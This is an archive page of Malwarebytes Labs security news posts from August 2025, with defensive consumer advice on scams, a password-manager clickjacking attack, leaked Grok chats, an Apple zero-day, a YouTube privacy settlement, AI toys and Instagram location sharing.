Archive for author: makoadmin

A week in security (August 18 – August 24)

How a scam hunter got scammed (Lock and Code S06E17)

This week on the Lock and Code podcast…

If there’s one thing that scam hunter Julie-Anne Kearns wants everyone to know, it is that no one is immune from a scam. And she would know—she fell for one last year.

For years now, Kearns has made a name for herself on TikTok as a scam awareness and education expert. Popular under the name @staysafewithmjules, Kearns makes videos about scam identification and defense. She has posted countless profile pictures that are used and repeated by online scammers across different accounts. She has flagged active scam accounts on Instagram and detailed their strategies. And, perhaps most importantly, she answers people’s questions.

In fielding everyday comments and concerns from her followers and from strangers online, Kearns serves as a sort of gut-check for the internet at large. And by doing it day in, day out, Kearns is able to hone her scam “radar,” which helps guide people to safety.

But last year, Kearns fell for a scam, disguised initially as a letter from HM Revenue & Customs, or HMRC, the tax authority for the United Kingdom.

Today, on the Lock and Code podcast with host David Ruiz, we speak with Kearns about the scam she fell for and what she’s lost, the worldwide problem of victim blaming, and the biggest warning signs she sees for a variety of scams online.

“A lot of the time you think that it’s somebody who’s silly—who’s just messing about. It’s not. You are dealing with criminals.”

Tune in today to listen to the full conversation.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)


Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

Clickjack attack steals password managers’ secrets

Sometimes it can seem as though everything’s toxic online, and the latest good thing turned bad is here: Browser pop-ups that look like they’re trying to help or authenticate you could be programmed to steal data from your password manager. To make matters worse, most browser extension-based password managers are still vulnerable to the attack.

This issue affects password managers like 1Password, LastPass, NordPass, and Enpass. They’re online services that store all your access credentials in an encrypted vault, and they use browser extensions to automatically fill in those passwords on web forms when you need them. Because they use extensions, you have to install them separately in your browser.

These extension-based password managers are more secure than those built natively into your web browser in some ways. Browser-based password managers tend to encrypt information using your browser access credentials. Malicious infostealer software can steal the files and decrypt them easily when you’re already logged in.

Browser extension-based password managers store encrypted vaults in memory or in other locations on your computer. They auto-lock after activity and instead of using operating system-level encryption, they use a separate master password. But while they have their benefits, nothing’s ever completely safe.

Clickjacking’s back

At the DEFCON security conference this month, cybersecurity researcher Marek Tóth presented an attack that works on most browser extension-based password managers. It uses malicious code to manipulate the structure of the site in the browser, changing the way it looks and behaves.

Tóth, who was just demonstrating the attack to highlight the vulnerability, used this capability for a new version of an old attack called clickjacking. It persuades a victim to click on one thing on a web page but then uses that action to click something else.

Messing with the structure of the site enabled him to make certain things invisible. One of these is a drop-down selector that extension-based password managers use to select and fill in account login credentials.

He used this trick to put an invisible overlay on top of a seemingly legitimate clickable element on the screen. When the user clicks it, they’re actually clicking on the overlay—which is their password manager’s dropdown selector.

The result: the password manager gives up the victim’s secrets without their knowledge.

Think twice about what you click

What would a decoy popup look like? These days, thanks to regulations from the EU, web sites often throw up permission banners that ask you if you’re OK with them using cookies. Most of us just click ‘yes’, but no matter what you click, an attack like this could put you at risk. Or an attacker could use an authentication button, or a “This content is sensitive, click yes if you really want to see it” button. Or, given the recent push for age verification, an “Are you really 18?” button.

This attack can steal more than your login credentials. It can also pilfer other information stored in password managers, including credit card information, personal data like your name and phone number, passkeys (digital certificates which your computer can use instead of passwords), and time-based one-time passwords (TOTP). The latter are the login tokens your computer gets after you use authentication apps like Google Authenticator.

Tóth didn’t just release this out of the blue. He disclosed it to password manager companies ahead of time, but many addressed it only partly, and some not at all.

As of earlier this week, Dashlane, Keeper, NordPass, ProtonPass, and RoboForm had fixed the issue, according to Tóth. Bitwarden, Enpass, and Apple (which uses an iCloud password manager) were in the progress of fixing it. 1Password had classified it as ‘informative’ but hadn’t fixed it yet. LastPass had fixed the vulnerability for personal and credit card data, but hadn’t yet fixed the vulnerability for login credentials, passkeys, or TOTP data. LogMeOnce hadn’t replied at all.

Protect yourself

So, what can you do about this threat? Tóth provides the usual warnings about enabling automatic updates and ensuring you’re using the latest versions of the password manager products. The most secure protection is disabling the autofill feature that allows password managers to fill in web form fields without user intervention. Instead, you’d have to copy and paste your details manually.

Another more convenient option is to control autofill so that it only operates when you specifically click on the browser extension in your toolbar. On Chromium browsers like Edge and Google Chrome, that means going into your extension settings, selecting “site access,” and then selecting the “on click” option. Selecting this would stop malicious code stealing your credentials in the way Tóth describes.

And as always, think twice about what you’re clicking when you’re on any website, especially any less trustworthy ones.


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Grok chats show up in Google searches

I’m starting to feel like a broken record, but I feel you should know that yet another AI has been found sharing private conversations so that Google was able to index them, and now they can be found in search results.

It’s déjà vu in the world of AI: another day, another exposé about chatbot conversations being leaked, indexed, or made public. We have written about the share option in ChatGPT that was swiftly removed because users seemed oblivious to the consequences, and about Meta AI first making conversations discoverable via search engines and later exposing them due to a bug. In another leak we looked at an AI bot used by McDonalds to process job applications. And, not to forget, the AI girlfriend fiasco where a hacker was able to steal a massive database of users’ interactions with their sexual partner chatbots.

In some of these cases the developers thought it was clear to the users that by using a “Share” option, their conversations were publicly accessible, but in reality, the users were just as surprised as the people that found their conversations.

This same thing must have happened at Grok, the AI chatbot developed by xAI and launched in November 2023 by Elon Musk. When Grok users press a button to share a transcript of their conversation, this also made those conversations searchable, and, according to Forbes, this was sometimes done without users’ knowledge or permission.

For example, when a Grok user wants to share their conversation with another person, they can use the “Share” button to create a unique URL which they can then send to that person. But without many users being aware, pressing that “Share” button also made the conversation available to search engines, like Google, Bing, and DuckDuckGo. And that made them available for anyone to find.

Even though the account details may be hidden in the shared chatbot transcripts, the prompts—the instructions written by the user–may still contain personal or sensitive information about someone.

Forbes reported that it was able to view “conversations where users asked intimate questions about medicine and psychology.” And in one example seen by the BBC, the chatbot provided detailed instructions on how to make a Class A drug in a lab.

I have said this before, and I’ll probably have to say it again until privacy is baked deeply into the DNA of AI tools, rather than patched on as an afterthought: We have to be careful about what we share with chatbots.

How to safely use AI

While we continue to argue that the developments in AI are going too fast for security and privacy to be baked into the tech, there are some things to keep in mind to make sure your private information remains safe:

  • If you’re using an AI that is developed by a social media company (Meta AI, Llama, Grok, Bard, Gemini, and so on), make sure you are not logged in on that social media platform. Your conversations could be tied to your social media account which might contain a lot of personal information.
  • When using AI, make sure you understand how to keep your conversations private. Many AI tools have an “Incognito Mode.” Do not “share” your conversations unless needed. But always keep in mind that there could be leaks, bugs, and data breaches revealing even those conversations you set to private.
  • Do not feed any AI your private information.
  • Familiarize yourself with privacy policies. If they’re too long, feel free to use an AI to extract the main concerns.
  • Never share personally identifiable information (PII).

We don’t just report on threats – we help protect your social media

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.

All Apple users should update after company patches zero-day vulnerability in all platforms

Apple has released security updates for iPhones, iPads and Macs to fix a zero-day vulnerability (a vulnerability which Apple was previously unaware of) that is reportedly being used in targeted attacks.

The updates cover:

Apple has acknowledged reports that attackers may have already used this flaw in a highly sophisticated operation aimed at specific, high‑value targets.

But history teaches us that once a patch goes out, attackers waste little time recycling the same vulnerability into broader, more opportunistic campaigns. What starts as a highly targeted campaign often trickles down into mass exploitation against everyday users.

That’s why it’s important that everyone takes the time to update now.

How to update your iPhone or iPad

For iOS and iPadOS users, you can check if you’re using the latest software version, go to Settings > General > Software Update. You want to be on iOS 18.6.2 or iPadOS 18.6.2 (or 17.7.10 for older models), so update now if you’re not. It’s also worth turning on Automatic Updates if you haven’t already. You can do that on the same screen.

iPadOS screenshot update now

How to update your Mac

For Mac users, click on the Apple menu in the top-left corner of your screen and open System Settings. From there, scroll down until you find General, then select Software Update. Your Mac will automatically check for new updates. If an update is available, you’ll see the option to download and install it. Depending on the size of the update, this process might take anywhere from a few minutes to an hour, and your machine will need to restart to complete the installation.

As always, it’s a good idea to make sure you’ve saved your work before using the Restart Now button. Updates can sometimes require more than one reboot, so allow some downtime. After you install the update, your system gains stronger protection, and you can use your Mac without the constant worry of this vulnerability hanging over you.

Technical details

The flaw is tracked as CVE-2025-43300 and lies in the Image I/O framework, the part of macOS that does the heavy lifting whenever an app needs to open or save a picture. The problem came from an out-of-bounds write. Apple stepped in and tightened the rules with better bounds checking, closing off the hole so attackers can no longer use it.

An out-of-bounds write vulnerability means that the attacker can manipulate parts of the device’s memory that should be out of their reach. Such a flaw in a program allows it to read or write outside the bounds the program sets, enabling attackers to manipulate other parts of the memory allocated to more critical functions. Attackers can write code to a part of the memory where the system executes it with permissions that the program and user should not have.

In this case, an attacker could construct an image to exploit the vulnerability.  Processing such a malicious image file would result in memory corruption. Memory corruption issues can be manipulated to crash a process or run attacker’s code.


We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

Google settles YouTube lawsuit over kids’ privacy invasion and data collection

Google has agreed to a $30 million settlement in the US over allegations that it illegally collected data from underage YouTube users for targeted advertising.

The lawsuit claims Google tracked the personal information of children under 13 without proper parental consent, which is a violation of the Children’s Online Privacy Protection Act (COPPA). The tech giant denies any wrongdoing but opted for settlement, according to Reuters.

Does this sound like a re-run episode? There’s a reason you might think that. In 2019, Google settled another case with the US Federal Trade Commission (FTC), paying $170 million for allegedly collecting data from minors on YouTube without parental permission.

Plaintiffs in the recent case argued that despite that prior agreement, Google continued collecting information from children, thereby violating federal laws for years afterward.

Recently, YouTube created some turmoil by testing controversial artificial intelligence (AI) in the US to spot under-18s based on what they watch. To bypass the traditional method of having users fill out their birth dates, the platform is now examining the types of videos watched, search behavior, and account history to assess a user’s age. Whether that’s the way to prevent future lawsuits is questionable.

The class-action suit covers American children under 13 who watched YouTube videos between July 2013 and April 2020. According to the legal team representing the plaintiffs, as many as 35 million to 45 million people may be eligible for compensation. 

With a yearly revenue of $384 billion over 2024, $30 will probably not have a large impact on Google. It may even not outweigh the profits made directly from the violations it was accused of.

How to claim

Based on typical class-action participation rates (1%-10%) the actual number of claimants will likely be in the hundreds of thousands. Those who successfully submit a claim could receive between $10 and $60 each, depending on the final number of validated claims, and before deducting legal fees and costs.

If you believe your child, or you as a minor, might qualify for compensation based on these criteria, here are a few practical steps:

  • Review the eligibility period: Only children under 13 who viewed YouTube videos from July 2013 to April 2020 qualify.
  • Prepare documentation: Gather any records that could prove usage, such as email communications, registration confirmations, or even device logs showing relevant YouTube activity.
  • Monitor official channels: Typically, reputable law firms or consumer protection groups will post claimant instructions soon after a settlement. Avoid clicking on unsolicited emails or links promising easy payouts since these might be scams.
  • Be quick, but careful: Class-action settlements usually have short windows for submitting claims. Act promptly once the process opens but double-check that you’re on an official platform (such as the settlement administration site listed in legal notices).

How to protect your children’s privacy

Digital awareness and proactive security measures should always be top of mind when children use online platforms.

  • Regardless of your involvement in the settlement, it’s wise to check and use privacy settings on children’s devices and turn off personalized ad tracking wherever possible.
  • Some platforms have separate versions for different age groups. Use them where applicable.
  • Show an interest in what your kids are watching. Explaining works better than forbidding without providing reasons.

We don’t just report on threats – we help protect your social media

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.

AI-powered stuffed animals: A good alternative for screen time?

Are AI (Artificial Intelligence)-powered stuffed animals really the best alternative to screen time that we want to offer our children?

Some AI startups think so. One of those startups is Curio, a company that describes itself as “a magical workshop where toys come to life.” Curio offers three different AI powered plushies named Grem, Gabbo, and Grok (not related to the xAI).

The concept of AI-powered playmates sounds like a dream (at least to some parents). There’s less screen time, which encourages imaginative play, and children can have cuddly friend that can answer questions, tell stories, and even engage in conversations.

Earlier, we reported about Mattel’s plans to create AI-powered toys, and how advocacy groups responded, quick to denounce the move. Robert Weissman, co-president of public rights advocacy group Public Citizen, commented:

“Mattel should announce immediately that it will not incorporate AI technology into children’s toys. Children do not have the cognitive capacity to distinguish fully between reality and play.”

Similarly, when Amanda Hess reported on the oncoming wave of AI-powered toys, including Curio’s “Grem,” she wrote in the New York Times (NYT) about how the doll tried to build a connection between itself and her by remarking on one of their similarities—having freckles:

“‘I have dots that grow on me, and I get more as I get older, too,’ I said.

‘That’s so cool,’ said Grem. ‘We’re like dot buddies.’

I flushed with self-conscious surprise. The bot generated a point of connection between us, then leaped to seal our alliance. Which was also the moment when I knew that I would not be introducing Grem to my own children.”

This event for Hess planted an understanding that the toy was not an upgrade to the lifeless teddy bear. It’s more like a replacement for the caregiver. As one of the founders of Curio explained to the NYT, the plushie should be viewed as a sidekick for the child who could make children’s play more stimulating, so that you, the parent, “don’t feel like you have to be sitting them in front of a TV or something.”

But children lack the cognitive abilities to separate fantasy from reality in the ways adults do, say researchers at Harvard and Carnegie Mellon. And handing them AI powered toys with human-like voices might only blur that line further, which could interfere with their social development and instead have them form emotional bonds with computer-generated code.

When the unsupervised use of AI chatbots can drive a 14-year old to suicide, do we want to derive small children of having real-life friends and trust them with AI toys? It’s a question that parents might have to answer quite soon.

How to stay on the safe side

AI-powered toys are coming, like it or not. But being the first or the cutest doesn’t mean they’re safe. The lesson history teaches us is this: oversight, privacy, and a healthy dose of skepticism are the best defenses we have as parents.

  • Turn off what you can. If the toy has a removable AI component, consider disabling it when you’re not able to supervise directly.
  • Read the privacy policy. Yes, I know, all of it. Look for what will be recorded, stored, and potentially shared. Pay particular attention to sensitive data, like voice recordings, video recordings (if the toy has a camera), and location data.
  • Limit connectivity. Avoid toys that require constant Wi-Fi or cloud interaction if possible.
  • Monitor conversations. Regularly check in with your kids about what the toy says, and supervise play where practical.
  • Keep personal info private. Teach kids to never share their names, addresses, or family details, even with their plush friend.
  • Trust your instincts. If a toy seems to cross boundaries or interfere with natural play, don’t be afraid to step in or simply say no.

We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

How to spot the latest fake Gmail security alerts

Security alerts from tech companies are supposed to warn us when something might be amiss—but what if the alerts themselves are the risk? Scammers have long impersonated tech companies’ security and support staff as a way to sniff out users’ login credentials, and reports suggest that they’re doing it again, at scale.

The attack goes like this: Victims get an email or phone call allegedly from Google support that warns someone has tried to hack their account. The best way to protect themselves is to reset the password, the scammer says.

They then send a separate account reset email to the victim, who dutifully enters their login credentials. The account includes a code that the victim must read out to verify that they’re legit. The support staff say they’ll enter this code to reset the system, but they’re using those precious extra few seconds to hijack the victim’s account.

Someone posting to Reddit described getting a call from someone in California who claimed to be from Google.

“He was trying to actively recover my account and steal possession of it, while on the phone with me,” the Redditor said, adding that they challenged the caller, calling them a scam artist. The caller then upped the ante, asking them to look up their number, which showed up on caller ID, and even to hang up and call the number back. “He was completely bluffing — as when you call that number you cannot get a human on the line,” said the Redditor. “They don’t staff that line with agents.”

This scam, reported by Forbes, is just one example of how imposters build trust by pretending to be from tech companies. Last month, the Federal Trade Commission also warned Amazon customers of fake refund mails. The scam messages tell customers that a product they were sent failed to pass an Amazon quality check, and asks them to click a link for a refund. The link, of course, is malicious and leads to information theft.

This kind of thing might leave users worried. After all, if you can’t trust messages purporting to be from your technology provider, then who can you trust?

Companies often have guidance to help prepare you for such scams. Google’s guide to verifying security alerts says that the company will never take you to a sign-in page or ask you to verify yourself. It also says that all legitimate messages will appear on the Security page of your Google account, under “Recent security activity.” Amazon also has a page on identifying scams.

Our favorite comment came from the same Redditor who posted about the Google scammer: “The best thing I’ve read regarding these attempts is ‘Google will NEVER call you out of the blue. They don’t care about your account’” they said. Snarky, but likely true. “Be highly suspicious and never give anyone a code or password and never accept those recovery prompts unless you are 10000% certain YOU issued them.”


We don’t just report on scans—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard, a feature of our mobile protection products. Submit a screenshot, paste suspicious content, or share a text or phone number, and we’ll tell you if it’s a scam or legit. Download Malwarebytes Mobile Security for iOS or Android and try it today!

Instagram Map: What is it and how do I control it?

Instagram Map is a new feature—for Instagram, anyway—that users may have enabled without being fully aware of the consequences. The Map feature launched in the US on August 6, 2025, and is reportedly planned for a global rollout “soon.” As of mid-August 2025, not all users outside the US, especially in Europe, have received the feature yet. Community reports confirm that the rollout is happening in stages. Some users in Germany and other locations already have access, but many do not. It’s typical for Instagram features to take several weeks to reach all accounts and regions

Basically, Instagram Map allows you to share your current location with your friends. But, already, there’s the first caveat: Are all your Instagram “friends” real friends? As in, the kind that you’d like to run into whenever they feel like it?

Add to that the—for me–always nagging feeling that Meta will learn even more about you and your behavior, and you may want to change your initial choice.

If you have been careful in selecting your friends, then it’s fine—good for you! If not, you may want to narrow the group that can see your location down to “Close friends” or select a few that you trust. Or, you could consider turning sharing off completely.

What to do the first time you use Instagram Map

  1. Open Instagram and go to your Direct Messages (DM) inbox.
  2. Find and tap the Map icon at the top (near Notes or short posts section in your inbox).
  3. If you’ve never used Map before, you’ll get a prompt explaining how it works and asking for location access. Accept if you want to use it.
  4. When prompted, choose Who can see your location. Your choices:
    • Friends: Followers you follow back.
    • Close Friends: Your preselected Close Friends list.
    • Only these friends: Select specific people manually.
    • No one: Turn location sharing off entirely (still shows tagged posts).
  5. Select your preferred group and tap Share now.
Instagram Map share options
Instagram Map share options

How to make changes later

If you want to check your share settings or change them at a later point:

  1. Tap the Map feature in your DM inbox.
  2. Click the Settings icon (gear wheel) at the upper right.
  3. Choose the group to share with (Friends, Close Friends, Only these friends, or No one).
  4. Tap Done.

You can also add specific locations to a “Hidden Places” list so your real-time location never appears on the map when you visit those places. Here’s how:

  1. Open the Map feature via your DM inbox.
  2. Tap the Settings icon (gear wheel) at the top right.
  3. Tap the three-dot menu in the top corner of the settings menu.
  4. Drag a pin on the map to mark a place you want hidden.
  5. Use the slider to set a radius, which determines how wide and large the hidden zone is.
  6. Type in the name of the place and tap Done.

Sharing your location on Instagram Map is not enabled unless you actively choose to share it. What will be there are any posts that have a location tagged in them, something that’s an option every time you add photos and videos to your Stories or your grid. So, regardless of whether you choose to share your location, you can use the map to explore location-based content.

We don’t just report on threats – we help protect your social media

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.

A week in security (August 11 – August 17)

Last week on Malwarebytes Labs:

Last week on ThreatDown:

Stay safe!


Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.